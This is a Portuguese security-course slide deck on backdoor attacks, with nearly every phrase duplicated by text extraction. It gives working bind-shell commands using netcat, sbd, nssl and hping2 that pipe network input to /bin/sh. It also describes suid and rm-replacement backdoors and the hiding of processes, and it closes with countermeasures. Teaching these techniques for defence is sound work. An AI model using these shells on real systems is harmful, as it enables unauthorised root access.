ataques com backdoors

Ataques com Ataques com BackdoorsBackdoors

ConceitoConceito

BackdoorBackdoor (porta dos fundos) é um trecho de (porta dos fundos) é um trecho de códigocódigo mal-intencionado que cria uma ou mais mal-intencionado que cria uma ou mais falhas de falhas de segurançasegurança para dar acesso ao para dar acesso ao sistema operacionalsistema operacional para pessoas não para pessoas não autorizadas. autorizadas.

Esta falha de Esta falha de segurançasegurança criada é análoga a criada é análoga a uma uma porta dos fundosporta dos fundos por onde a pessoa por onde a pessoa mal intencionada pode entrar (invadir) o mal intencionada pode entrar (invadir) o sistema. sistema.

Como inserirComo inserir

BackdoorsBackdoors podem ser inseridos podem ser inseridos propositalmente pelos criadores do propositalmente pelos criadores do sistema ou podem ser obra de sistema ou podem ser obra de terceiros mal intencionados, usando terceiros mal intencionados, usando para isso, um vírus, verme ou cavalo para isso, um vírus, verme ou cavalo de tróia). de tróia).

BackdoorBackdoor

O termo pode ser usado de forma O termo pode ser usado de forma mais ampla para designar mais ampla para designar formas formas furtivas de se obter informações furtivas de se obter informações privilegiadasprivilegiadas em sistemas de todo em sistemas de todo tipo. tipo.

SpywaresSpywares

Consistem programas automáticos de Consistem programas automáticos de computador, que recolhem computador, que recolhem informações sobre o usuário, sobre informações sobre o usuário, sobre seus costumes na Internet e transmite seus costumes na Internet e transmite esta informação a uma entidade esta informação a uma entidade externa na Internet, sem o seu externa na Internet, sem o seu conhecimento e o seu consentimento.conhecimento e o seu consentimento.

SpywaresSpywares

Diferem dos Cavalos de Tróia por não Diferem dos Cavalos de Tróia por não terem como objetivo que o sistema terem como objetivo que o sistema do usuário seja dominado, seja do usuário seja dominado, seja manipulado, por uma entidade manipulado, por uma entidade externa, por um cracker. externa, por um cracker.

ProteçãoProteção

A proteção mais comum contra A proteção mais comum contra BackdoorsBackdoors em computadores em computadores pessoais é o uso de firewalls e de IDS. pessoais é o uso de firewalls e de IDS. De modo geral, De modo geral, BackdoorsBackdoors que que atuam através da Internet podem ser atuam através da Internet podem ser detectados (por um IDS) ou impedidos detectados (por um IDS) ou impedidos de atuar (pelo firewall).de atuar (pelo firewall).

Ou por programas Anti-Spiwares.Ou por programas Anti-Spiwares.

BackdoorsBackdoors

Criam Criam “portas de fundo”“portas de fundo” em um sistema em um sistema operacional.operacional.

BackdoorBackdoor em sistemas UNIX. em sistemas UNIX. Necessitam de Necessitam de acesso localacesso local à máquina. à máquina. Técnica que consiste em Técnica que consiste em garantir uma garantir uma

forma de acessoforma de acesso a um determinado a um determinado sistema operacional de forma não-sistema operacional de forma não-convencional.convencional.

Acesso com direitos de Acesso com direitos de root root (superusuário).(superusuário). Portas ocultas através de serviços triviais.Portas ocultas através de serviços triviais.

BackdoorsBackdoors

Meio de garantir a volta ao sistema Meio de garantir a volta ao sistema (acessos futuros), numa nova (acessos futuros), numa nova intrusão, no sentido de poupar intrusão, no sentido de poupar trabalho.trabalho.

Vão desde aquelas que Vão desde aquelas que abrem uma abrem uma porta através de um shellporta através de um shell, até , até aquelas que surgem da aquelas que surgem da instalação instalação de rootkitsde rootkits capazes de automatizar capazes de automatizar o processo de uma intrusão.o processo de uma intrusão.

BackdoorsBackdoors

Backdoor do Backdoor do PasswdPasswd

Registrar uma conta do usuário Registrar uma conta do usuário backdoor:backdoor:

/etc/passwd (UNIX)/etc/passwd (UNIX)

/etc/shadow (distribuições Linux)/etc/shadow (distribuições Linux)

A mais fácil de se fazer, mas a mais A mais fácil de se fazer, mas a mais fácil de ser detectada.fácil de ser detectada.

BackdoorBackdoor

Backdoor do Backdoor do SetUIDSetUID Existe uma permissão especial em Existe uma permissão especial em

UNIX e Linux, que um determinado UNIX e Linux, que um determinado arquivo pode vir a ser executado por arquivo pode vir a ser executado por qualquer usuário com direito de qualquer usuário com direito de rootroot..

Isto é chamado Isto é chamado SetUIDSetUID.. A partir dessa possibilidade pode-se A partir dessa possibilidade pode-se

criar uma criar uma backdoorbackdoor para dar direito a para dar direito a usuário do sistema o mesmo direito de usuário do sistema o mesmo direito de root.root.

BackdoorBackdoor

Backdoor do Backdoor do InetdInetd

O O /etc/inetd.conf/etc/inetd.conf é o arquivo por onde é o arquivo por onde se pode iniciar serviços do UNIX e Linux.se pode iniciar serviços do UNIX e Linux.

Assim, é possível Assim, é possível criar um serviço criar um serviço especialespecial para que possamos para que possamos ter ter acesso aos sistema com direito de acesso aos sistema com direito de rootroot..

BackdoorBackdoor

Backdoor com Backdoor com Hora MarcadaHora Marcada

A backddoor é criada de A backddoor é criada de forma forma agendadaagendada, aproveitando, os recursos , aproveitando, os recursos do AT ou Crontab. Por exemplo, do AT ou Crontab. Por exemplo, agendando no Crontab uma tarefa agendando no Crontab uma tarefa que nada mais é que o script para que nada mais é que o script para fazer funcionar a backdoor no tempo fazer funcionar a backdoor no tempo agendado. agendado.

Backdoors Inetd e PasswdBackdoors Inetd e Passwd

Técnicas antigasTécnicas antigas

Script com requinte de Script com requinte de engenhosidade usando-se o engenhosidade usando-se o comando comando splitsplit (o uso do esquema de (o uso do esquema de dividir o arquivo e jogar as dividir o arquivo e jogar as informações no meio do arquivoinformações no meio do arquivo através do comando através do comando splitsplit).).

Backdoors de SuitBit Backdoors de SuitBit

Backdoors Backdoors baseados embaseados em SuitBit SuitBit

SuitBitSuitBit significa acesso com significa acesso com SetUIDSetUID e e SetGIDSetGID. .

Consistem em fazer cópia de um Consistem em fazer cópia de um shell shell vulnerável à manipulação de vulnerável à manipulação de SuitBitSuitBit ((chmod a+s chmod a+s na máquina vítima) e na máquina vítima) e atribuir atribuir SuitBitSuitBit a essa cópia. a essa cópia.

Backdoors de SuitBitBackdoors de SuitBit

Sofisticação das Sofisticação das backdoorsbackdoors de SuitBit, de SuitBit, que na sua maioria já não são que na sua maioria já não são simplesmente arquivos ocultos cópias simplesmente arquivos ocultos cópias de shell, são camufladas de maneira de shell, são camufladas de maneira que um comando genérico possa que um comando genérico possa acioná-la.acioná-la.

São bastante populares, por poderem São bastante populares, por poderem ser adaptados a qualquer UNIX.ser adaptados a qualquer UNIX.

Backdoors de SuitBitBackdoors de SuitBit

Um exemplo é um cracker executar Um exemplo é um cracker executar com senha de root, um programa com senha de root, um programa para executar um shell baseado na para executar um shell baseado na técnica de SuidBit.técnica de SuidBit.

Backdoor de SuidBitBackdoor de SuidBit

Uma forma de Uma forma de proteger o sistemaproteger o sistema contra esse tipo de backdoor, é contra esse tipo de backdoor, é usar usar a instrução “nosuid”a instrução “nosuid” no no arquivo arquivo /etc/fstab/etc/fstab, na respectiva , na respectiva linha correspondente ao linha correspondente ao /home/home e e /tmp/tmp, que são , que são onde os crackers onde os crackers geralmente tentam criar geralmente tentam criar esse tipo esse tipo de backdoor.de backdoor.

Backdoor de SuidBit Backdoor de SuidBit Substituindo Arquivo de ComandoSubstituindo Arquivo de Comando

Criar um arquivo que pode substituir um Criar um arquivo que pode substituir um arquivo arquivo de comandode comando, não muito usado, como por , não muito usado, como por exemplo, exemplo, /bin/cpio/bin/cpio ou ou /bin/rm/bin/rm..

O cracker move o O cracker move o rmrm original para original para /bin/rm.original./bin/rm.original.

Compila o código “Compila o código “gcc –o rm backdoorgcc –o rm backdoor”.”. Atribui SuidBit.Atribui SuidBit. Toda vez que é executado Toda vez que é executado rm sem argumentosrm sem argumentos, ,

na realidade é executado, na realidade é executado, via chamada interna via chamada interna do sistema, o do sistema, o /bin/rm.original/bin/rm.original e, quando for e, quando for passado o parâmetro “passado o parâmetro “ninjaninja”, é executada a ”, é executada a backdoor.backdoor.

Exemplos de BackdoorExemplos de Backdoor

O código, após compilado, estabelece O código, após compilado, estabelece o SuidBit e a backdoor só é gerada o SuidBit e a backdoor só é gerada com a digitação da palavra-chave com a digitação da palavra-chave reconhecida.reconhecida.

Backdoor desenvolvida em Backdoor desenvolvida em script script para o shell BASHpara o shell BASH, com o uso do , com o uso do esquema de dividir o arquivoesquema de dividir o arquivo e e colocar as informações no meio do colocar as informações no meio do arquivo através do comando arquivo através do comando splitsplit..

Backdoors através de Backdoors através de FerramentasFerramentas

Úteis para um administrador, mas podendo Úteis para um administrador, mas podendo serem usadas por crackers.serem usadas por crackers.

NetcatNetcat

SBD SBD

NSSL NSSL

Hping2 (montador de pacotes)Hping2 (montador de pacotes)

NetcatNetcat

Netcat pode ser usada para Netcat pode ser usada para varreduras UDP e TCP.varreduras UDP e TCP.

Um recurso para um invasor em um Um recurso para um invasor em um ambiente que tenha instalado o ambiente que tenha instalado o Netcat é a possibilidade de colocá-lo Netcat é a possibilidade de colocá-lo no modo de “listen” (ouvindo) em no modo de “listen” (ouvindo) em uma porta com uma aplicação uma porta com uma aplicação vinculada.vinculada.

Imagine que essa aplicação seja um Imagine que essa aplicação seja um interpretador de comando (shell) interpretador de comando (shell) shsh..

NetcatNetcat Teremos uma backdoor simples em atividade, Teremos uma backdoor simples em atividade,

fazendo:fazendo:

O Netcat é ativado através de um O Netcat é ativado através de um shellshell na porta na porta 55555:55555:

#> nc -l -p 55555 -e /bin/sh &#> nc -l -p 55555 -e /bin/sh &

Para se conectar o invasor deve fazer:Para se conectar o invasor deve fazer: #> nc ip.ip.ip.ip 55555 #> nc ip.ip.ip.ip 55555 isto cria um socket na porta ativa 55555 de um isto cria um socket na porta ativa 55555 de um

servidor de <ip>, que tem o serviço TCP ativo servidor de <ip>, que tem o serviço TCP ativo fornecido pelo shell fornecido pelo shell shsh..

NetcatNetcat

Se esse procedimento for executado Se esse procedimento for executado com senha de com senha de rootroot, o usuário que , o usuário que ativou o Netcat é que terá esse ativou o Netcat é que terá esse direito.direito.

SBD (Variante do Netcat)SBD (Variante do Netcat)

Para sistemas UNIX ou Windows.Para sistemas UNIX ou Windows.

Possui todos os recursos do Netcat, Possui todos os recursos do Netcat, mas o que é notável é que suporta mas o que é notável é que suporta criptografia com “AES-CBC-criptografia com “AES-CBC-128+HMAC-SHA1 encryption)”, o que 128+HMAC-SHA1 encryption)”, o que permite comunicações cifradas.permite comunicações cifradas.


Para plataformas UNIX Para plataformas UNIX (Linux, FreeBSD, OpenBSD, NetBSD, ... ) (Linux, FreeBSD, OpenBSD, NetBSD, ... ) deve-se executar o comando deve-se executar o comando makemake

parapara obter as várias formas de compilação:obter as várias formas de compilação: #> make unix#> make unix

Para SunOS/Solaris:Para SunOS/Solaris: #> make sunos#> make sunos

SBD (Variante do Netcat)SBD (Variante do Netcat) Para Windows Win32 (NT/2000/XP) é necessário o Para Windows Win32 (NT/2000/XP) é necessário o

MinGW+MSYS ou Cygwin instalado com toda a base de MinGW+MSYS ou Cygwin instalado com toda a base de desenvolvimento:desenvolvimento:

Para compilar para Cygwin padrão:Para compilar para Cygwin padrão: #> make win32#> make win32 Com MSYS: Com MSYS: #> make mingw#> make mingw Para modo WinMain com Cygwin: Para modo WinMain com Cygwin: #> make win32bg#> make win32bg Sob MSYS:Sob MSYS: #> make mingwbg#> make mingwbg

Para compilar para console Cygwin:Para compilar para console Cygwin: #> make cygwin#> make cygwin


O que é O que é Pen-TestPen-Test

Deve-se confrontar o que denominamos Deve-se confrontar o que denominamos como seguro em nossos sistemas como seguro em nossos sistemas computacionais e ter uma dimensão computacionais e ter uma dimensão mais realista de quanto são (ou não são) mais realista de quanto são (ou não são) realmente seguros. realmente seguros.

Pen-Test com SBD Pen-Test com SBD (exemplo a seguir)(exemplo a seguir)

Backdoor para Pen-Test Backdoor para Pen-Test com SBDcom SBD

1. De forma simples (sem chave)1. De forma simples (sem chave) #> sbd -l -p 12345 -e /bin/sh#> sbd -l -p 12345 -e /bin/sh Para se concetar à backdoor:Para se concetar à backdoor: #> sbd 192.168.200.171 12345#> sbd 192.168.200.171 12345 2. Criando uma chave “ninja”para a conexão:2. Criando uma chave “ninja”para a conexão: #> #> ../sbd -l -p 12345 -k ninja -e /bin/sh/sbd -l -p 12345 -k ninja -e /bin/sh Para se concetar à backdoor com a chave:Para se concetar à backdoor com a chave: #> sbd -k ninja 192.168.200.171. 12345#> sbd -k ninja 192.168.200.171. 12345

NSSLNSSL

Uma variante do Netcat com suporte Uma variante do Netcat com suporte a SSL.a SSL.

Requer OpenSSL.Requer OpenSSL. Suporte SSL v.3Suporte SSL v.3 Possibilita Possibilita leitura de leitura de bannersbanners em em

serviços que utilizam SSLserviços que utilizam SSL..

Exemplos de backdoor com Exemplos de backdoor com NSSLNSSL

1. Sem suporte a SSL:1. Sem suporte a SSL: nssl –rcl 1111 –e /bin/bash nssl –rcl 1111 –e /bin/bash Para se conectar à backdoor:Para se conectar à backdoor: nssl 192.168.100.171 1111nssl 192.168.100.171 1111 2. Com suporte a SSL:2. Com suporte a SSL: nssl –cl 2222 –e /bin/bashnssl –cl 2222 –e /bin/bash Para se conectar à backdoor:Para se conectar à backdoor: nssl 192.168.100.171 2222nssl 192.168.100.171 2222

Hping2Hping2

Similar ao Netcat, o Hping pode ser Similar ao Netcat, o Hping pode ser utilizada por um cracker na construção de utilizada por um cracker na construção de uma backdoor.uma backdoor.

Hping2 deve ser instalada somente na Hping2 deve ser instalada somente na máquina do administrador e não num máquina do administrador e não num servidor. Nem em uma servidor. Nem em uma DMZDMZ. .

Documentação original do Hping: Documentação original do Hping: referência sobre como se criar uma referência sobre como se criar uma backdoor utilizando Hping2.backdoor utilizando Hping2.

DMZ – Zona DesmilitarizadaDMZ – Zona Desmilitarizada DMZ = Uma DMZ = Uma LAN de Isolamento LAN de Isolamento Um ambiente Um ambiente parcialmente protegidoparcialmente protegido..

É uma rede local que isola uma É uma rede local que isola uma rede rede corporativacorporativa do mundo exterior. do mundo exterior.

Assim, isola a rede corporativa, da Internet.Assim, isola a rede corporativa, da Internet.

Possui um endereço de rede exclusivo, que difere Possui um endereço de rede exclusivo, que difere do endereço da rede corporativa.do endereço da rede corporativa.

A DMZ é a única que pode ser vista de fora.A DMZ é a única que pode ser vista de fora.

DMZ – Uma LAN parcialmente DMZ – Uma LAN parcialmente protegidaprotegida

Uma DMZ é criada por um Uma DMZ é criada por um roteador de roteador de perímetro perímetro (o ponto de demarcação entre uma (o ponto de demarcação entre uma rede desprotegida e uma rede desprotegida e uma rede parcialmente rede parcialmente protegidaprotegida – a Internet e a DMZ, por exemplo); – a Internet e a DMZ, por exemplo);

Hosts de segurançaHosts de segurança (um servidor protegido (um servidor protegido que fornece serviços ao mundo exterior, tais que fornece serviços ao mundo exterior, tais como FTP, Web, DNS, SMTP e Proxy Web) e;como FTP, Web, DNS, SMTP e Proxy Web) e;

Gateways de aplicativo Gateways de aplicativo (firewalls que (firewalls que inspeciona mensagens no nível dos inspeciona mensagens no nível dos aplicativos) aplicativos)

Hping2Hping2 Para a construção de uma backdoor, utiliza-se a Para a construção de uma backdoor, utiliza-se a

opção -9 (listen) combinada com o “|” (pipe) com opção -9 (listen) combinada com o “|” (pipe) com uma chamada de shell, como /bin/sh.uma chamada de shell, como /bin/sh.

#> hping -i eth0 -9 cmd | /bin/sh#> hping -i eth0 -9 cmd | /bin/sh

Todos os pacotes que contenham “cmd” (uma Todos os pacotes que contenham “cmd” (uma string pré-definida) serão processados e os bytes string pré-definida) serão processados e os bytes seguintes ao “cmd”, também.seguintes ao “cmd”, também.

Desta forma, uma backdoor com Hping2 pode ser Desta forma, uma backdoor com Hping2 pode ser furtiva o suficiente em um sistema violado.furtiva o suficiente em um sistema violado.

Hping2Hping2 Imagine um cenário em que Imagine um cenário em que um administrador um administrador

costume instalar aplicativos poderosos,costume instalar aplicativos poderosos, como o Hping2, como o Hping2, para fins de teste e não os para fins de teste e não os removaremova..

A backdoor é um processo ativo, A backdoor é um processo ativo, mas um mas um invasor pode ocultar esse processoinvasor pode ocultar esse processo forjando forjando comandos com comandos com ps ps e e fuserfuser..

Um servidor com o Hping2 instaladoUm servidor com o Hping2 instalado pode ser pode ser facilmente manipulado remotamente por uma facilmente manipulado remotamente por uma backdoor que não precisa criar um usuário backdoor que não precisa criar um usuário da porta de qualquer serviço TCP ativoda porta de qualquer serviço TCP ativo..

Hping2Hping2

Mesmo que exista uma Mesmo que exista uma política de política de segurança de perímetrosegurança de perímetro bem bem elaborada, ainda assim seria possível elaborada, ainda assim seria possível a a passagem de comandos para a passagem de comandos para a máquina invadidamáquina invadida, pois seria feita , pois seria feita através de através de um serviço oficialmente um serviço oficialmente disponíveldisponível cuja comunicação seria cuja comunicação seria liberada via Firewallliberada via Firewall..

Veja exemplo a seguir:Veja exemplo a seguir:

Backdoor com Hping2 através Backdoor com Hping2 através de SMTPde SMTP

Seja uma Seja uma string pré-definida concatenada a um comandostring pré-definida concatenada a um comando: : cmdcmdlsls

O seguinte exemplo mostra uma conexão com a backdoor O seguinte exemplo mostra uma conexão com a backdoor através do serviço SMTP Sendmail, porta 25 de serviço TCP através do serviço SMTP Sendmail, porta 25 de serviço TCP ativo.ativo.

O “O “;;” final indica o fim do comando para o Hping2 que irá ” final indica o fim do comando para o Hping2 que irá executá-lo.executá-lo.

$> telnet 192.168.1.1 25 (xpto.lammer.xxx.br)$> telnet 192.168.1.1 25 (xpto.lammer.xxx.br) Trying... 192.168.1.1Trying... 192.168.1.1 Connected to lammer (192.168.1.1).Connected to lammer (192.168.1.1). Escape character is `^]`. Escape character is `^]`. 220 192.168.1.1 ESMTP Sendmail 220 192.168.1.1 ESMTP Sendmail cmdcmdlsls;;

Contramedidas para Contramedidas para BackdoorsBackdoors

Lembrar das backdoors mais engenhosas !Lembrar das backdoors mais engenhosas ! Uma backdoor simples como a do Uma backdoor simples como a do

/etc/passwd pode ser instalada apenas /etc/passwd pode ser instalada apenas para desviar a atenção do administrador. para desviar a atenção do administrador. Este a remove e na sequência aplica um Este a remove e na sequência aplica um patch de correção e assume que o patch de correção e assume que o problema está resolvido.problema está resolvido.

Técnicas de backdoor podem ser Técnicas de backdoor podem ser empregadas por invasores internos.empregadas por invasores internos.


Um mecanismo recomendável para Um mecanismo recomendável para qualquer servidor é a utilização de qualquer servidor é a utilização de IDS de hostsIDS de hosts, para que o , para que o administrador tenha a capacidade de administrador tenha a capacidade de avaliar o quanto seu sistema foi avaliar o quanto seu sistema foi comprometido.comprometido.


Mas, invasores com conhecimentos Mas, invasores com conhecimentos avançados podem utilizar técnicas para avançados podem utilizar técnicas para ultrapassar o IDS de hostultrapassar o IDS de host, caso este , caso este tenha alguma limitação visível.tenha alguma limitação visível.

Para UNIX BSD e Linux, temos o IDS de Para UNIX BSD e Linux, temos o IDS de host host Tripwire Tripwire ((Tripwire.orgTripwire.org - - HomeHome of of thethe TripwireTripwire Open Open SourceSource Project Project))

http://www.tripwire.org/downloads/indexhttp://www.tripwire.org/downloads/index..phpphp


Aplicar políticas de segurança no Aplicar políticas de segurança no sistema de arquivos dos servidores. sistema de arquivos dos servidores. Em Linux e UNIX BSD, opções Em Linux e UNIX BSD, opções noexecnoexec, , nodevnodev e e nosuidnosuid, tornarão os , tornarão os sistemas mais seguros.sistemas mais seguros.


Eliminar do servidor todo recurso desnecessário. Eliminar do servidor todo recurso desnecessário.

Serviços que não são usados e ferramentas Serviços que não são usados e ferramentas propícias a invasores, como Hping, Netcat, Wget, ...propícias a invasores, como Hping, Netcat, Wget, ...

Wget (GNU Wget (GNU wgetwget is a free software package for is a free software package for retrieving files using HTTP, ...)retrieving files using HTTP, ...)

www.gnu.org/software/www.gnu.org/software/wgetwget//wgetwget.html.html

Recomendação da Norma Internacional de Recomendação da Norma Internacional de Segurança BS17799 (item 9.5.5), seguida pela Segurança BS17799 (item 9.5.5), seguida pela ABNT.ABNT.

ataques com backdoors

Documents